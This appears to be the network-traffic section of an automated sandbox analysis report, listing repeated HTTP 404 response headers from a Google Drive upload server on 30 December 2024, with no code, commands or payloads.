                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5a8Hylz2GXZj_Tr9C--RZgn4FSxYgicW4xA88nH5lKB6enIZgkZRQFwM6YFuLFb_QpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:13 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-DABI4s1MsBwenk0MRYZjEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Tdjip8I6pbSmSZ0EnrW-4Iipe72JU4G0BxKzyqODq30LAVMg55KbET22_1y5IxPD6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:13 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-v4rrZ8of4JjWSc5dY7DrvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6EAPOmKhA_gWbMvJC8908cwpTj0GZFkYtISuLq2v-s8tVhFw2Jjf7xoDhTqwqLAJqIso4MOPUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:14 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-oOnm4d8JGe3TrPSmC5Bwbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ubqEIYe6YOnfzrx9VXj2W5hAHwGMFaIu0lpqP3kEyAuXocpmCK-44CybPt4fe-vwC87QU9w8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:14 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BGbdC967Eby53dQMJcfgJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5UV9oGBmUE-1sasGmyAgnuoxxrbFEnpcAz5Pq4rT_nGJJf8vSuaA6V7kvYtLUU_xmKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:15 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-fokb52irs_bGpPwOKFmNYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6z2N3NvI2weFRccvZp4SyX7BDxpQF9Zgm9YhKrf3IXhjlxAoBgOHcJ3hd0jtQPCO_zContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:15 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-eWvAs2XVHx7_Pe-e629Uzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC61PnWczh5LjhwO0TH0ZhHh2G3_O8wMRYGwttarf4lq-_UI2SK5DimXx5MCRnrQntlBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:16 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-0iltXz3Lc-1Qz9JNuRypFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC79fRQ0xDJzKhhrhW43iuwUG8D9JfTVFwU_tR9qjOfa_O73j-vur-te7wSIOl65VbwHContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:18 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-Yw4D6mnqJaa54X5EuXvhSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5WTFD8RZYrWLKXFWiTpuOa8xenn_P0e97QFYh2h6NSIdH4ulXEhHeC_QaIStpK0hGQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:18 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-S87_bbUTD85VI8NrqDRswA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5zcyiTg5OMs69BgOc1cfy2_r3EgVnEhNy_KXYucXBFgZHDTUlnS11UFHnC13KcYhSyContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:19 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-TaxFDyfgN1uJLPZMOsUcLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC63vlNkZIX7CloRa619-y5YYD_B1oYmIlkbBnP4cXglVvQFhpGuX_i5kLMmBIlnYGmrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:19 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-wSTortnK_NYLpAqRtUDAFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC46Kk0GrMMzYDGfzAXpFFLq_sdivZihHjdeK41WelT5MfQHJAFtJ64zJ47XV02UPUGnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:21 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-V-CfUw3m4stTsnfDcpMq_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6LLNIL2q4oaEY17hjxSDux6eKfNneEBcy4cXjYCORB4UJwdvW2VfDgGiB6CiWeSf5rny0Z7bAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:22 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-PZ8BUf7F1pey32npRv8aBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4qZBrOu9Vbq4ZpJs-m3ICW-jXR230sunNPKPp5yfDDsR9cRwbfPCox2Ud--SnxnSP3xwmWYDEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:22 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GhNaXyWWIaDUC57xuSPOeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Pu4FVZv8wMhGDxu58FvEKq-NDASZ7YVlgSEmvGqHPStyXQAUX4irarL9sPGx0f4lnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:23 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tIIcgAeIanzeBG9hvVN26w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC67ecML96lMcQGfjXlyvYcCyK1P0nfG5gUhPXrPdLvatjJZRrM-hY6K3tmZKfFxZhNqjjL8QPIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:23 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BOqTFQr0SU6hY8UxKO32uQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Y-4Fm9Dqv5q5bSWptxrQG64-8vCPkLxvbyBA-55-htik6W0TYCb0MVE0QMiTowBAUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:25 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_g01x9ra4Wpcjzs6NvEUQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5QYYDzA2FFC5sH9x_PZqx2YK_6ct9Ubc5pZKDSflzdsUouHZj4k-8MZXFfuUQ_khLrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:26 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9LKDbb21t-EdF4AkHC0PzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5xrr4CkXN95JFUU7t0BZ9bpRCz5_ciNOJC2KSwRkjUsifV1pUs98loiXV_NJetR6oBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:26 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Cr7M67qxlSZbOd2vRBsNuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC758pAaK92V21I_xvdmF7W3WZdOCEzAdhxg1_3NlraJGzSQlV241juKpkJgU0S8bseBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-oCMs8h9ozMJ2fNcU-uxSeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
